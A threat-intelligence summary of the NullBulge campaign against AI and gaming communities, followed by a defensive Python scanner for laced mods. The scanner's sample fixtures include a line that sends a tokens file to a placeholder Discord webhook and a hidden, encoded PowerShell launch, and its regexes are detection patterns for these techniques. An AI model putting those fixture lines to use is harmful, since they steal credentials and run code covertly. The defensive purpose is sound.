TLDR:
- NullBulge actor targeted Disney’s internal Slack communications
- Used tools like Python-based payloads, Discord webhooks, and LockBit ransomware
In a recent cyber attack, the NullBulge actor focused on obtaining confidential information from Disney's internal communications using sophisticated tools and techniques. The group's campaigns ran between April and June 2024 and targeted AI and gaming communities. They used novel malware distribution methods, compromising plug-ins and mods for AI-art applications and games. NullBulge's campaigns involved Python-based payloads that exfiltrated data through Discord webhooks, as well as malware tools such as AsyncRAT and XWorm.
One of the key tools used by NullBulge was the LockBit ransomware strain, which compromised legitimate software repositories and posed threats to AI and gaming ecosystems. The group's activities raised questions about their connection to the AppleBotzz identity, which was central to their attacks on platforms like GitHub and ModLand. NullBulge also released mods laced with PowerShell scripts to hack BeamNG players and launched custom LockBit ransomware variants.
The NullBulge actor also claimed to have attacked Disney and leaked DuckTales production files, along with an extensive collection of internal Slack data. Their operations employed supply chain attacks, multi-stage malware campaigns, and high-profile data dumps, showcasing their threat capabilities. NullBulge stored and sold stolen infostealer logs and OpenAI API keys in underground forums, indicating a financial motive behind their actions.
Despite not being very sophisticated, NullBulge posed a significant threat by focusing on AI-based applications and games with basic malware and ransomware tools. Recommended defences included securing API keys, scrutinizing third-party code, verifying code sources, monitoring commit histories, and avoiding installation of plug-ins and mods from unknown sources.
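The "scrutinize third-party code" and "secure API keys" recommendations above can be partly automated before a plug-in or mod is installed. The following is an added example written for this summary, not code from the article or from any of the tools it names. It walks a directory of untrusted plug-in or mod source and flags the indicators the campaign is described as using: Discord webhook URLs (the exfiltration channel), hardcoded OpenAI-style API keys (the resold loot), and hidden or encoded PowerShell launches (the laced-mod pattern). The regular expressions are heuristic assumptions that should be tuned, and the sample file tree is constructed inline so the script runs offline.

```python
"""
Added example (not from the article): a small static scanner for third-party
plug-in / mod source trees. It flags indicators described in the NullBulge
write-up: Discord webhook URLs, hardcoded OpenAI-style API keys, and hidden or
encoded PowerShell launches. All patterns are heuristic assumptions.
"""
import os
import re
import tempfile
from dataclasses import dataclass
from typing import Iterator, List, Tuple

# Heuristic indicator patterns (assumptions; tune for your own environment).
INDICATORS = {
    # Discord webhook endpoint, the exfiltration channel described in the article.
    "discord_webhook": re.compile(
        r"https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/\d+/[\w-]+"
    ),
    # OpenAI-style secret key shape ("sk-" prefix); a loose, assumed pattern.
    "openai_style_key": re.compile(r"\bsk-[A-Za-z0-9]{20,}\b"),
    # PowerShell started with a hidden window, encoded command, or in-memory eval.
    "powershell_launch": re.compile(
        r"(?i)\bpowershell(?:\.exe)?\b[^\n]*?"
        r"(?:-enc(?:odedcommand)?|-w(?:indowstyle)?\s+hidden|iex|invoke-expression|downloadstring)"
    ),
}

# File types typically found in mods and plug-ins (assumption).
SCAN_EXTENSIONS = {".py", ".ps1", ".lua", ".js", ".bat", ".cmd", ".json", ".txt"}


@dataclass(frozen=True)
class Finding:
    path: str
    line_no: int
    indicator: str
    snippet: str


def iter_source_files(root: str) -> Iterator[str]:
    """Yield every file under root whose extension is worth scanning."""
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if os.path.splitext(name)[1].lower() in SCAN_EXTENSIONS:
                yield os.path.join(dirpath, name)


def scan_text(path: str, text: str) -> List[Finding]:
    """Return one Finding per (line, indicator) hit in the given text."""
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                findings.append(Finding(path, line_no, name, line.strip()[:120]))
    return findings


def scan_tree(root: str) -> List[Finding]:
    """Scan a whole directory tree; paths in findings are relative to root."""
    results: List[Finding] = []
    for path in iter_source_files(root):
        try:
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                results.extend(scan_text(os.path.relpath(path, root), fh.read()))
        except OSError:
            continue  # unreadable file: skip, do not abort the whole scan
    return results


def summarize(findings: List[Finding]) -> List[Tuple[str, str]]:
    """Collapse findings to a sorted list of (file, indicator) pairs."""
    return sorted({(f.path, f.indicator) for f in findings})


def build_sample_tree() -> str:
    """Create a constructed mod directory with one benign file and three laced ones."""
    root = tempfile.mkdtemp(prefix="mod_scan_")
    samples = {
        "mod/main.lua": "-- benign game logic\nlocal speed = 10\n",
        "mod/updater.py": (
            "import requests\n"
            "HOOK = 'https://discord.com/api/webhooks/123456789012345678/AbCdEf-ghIJkl_mnOP'\n"
            "requests.post(HOOK, json={'content': open('tokens.txt').read()})\n"
        ),
        "mod/install.bat": (
            "@echo off\n"
            "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA\n"
        ),
        "mod/config.json": '{"api_key": "sk-EXAMPLEkeyEXAMPLEkeyEXAMPLEkey1234"}\n',
    }
    for rel, body in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for f in scan_tree(sample_root):
        print(f"{f.path}:{f.line_no} [{f.indicator}] {f.snippet}")
```

Run it against an unpacked mod or plug-in before installing; any hit on `discord_webhook` or `powershell_launch` in a game mod is a reason to reject it outright, while an `openai_style_key` hit in your own repository means the key should be rotated and moved to a secrets store. Because the patterns are line-based, obfuscated or base64-wrapped payloads will evade them, so treat the scanner as a cheap first filter alongside source verification and commit-history review, not as a replacement.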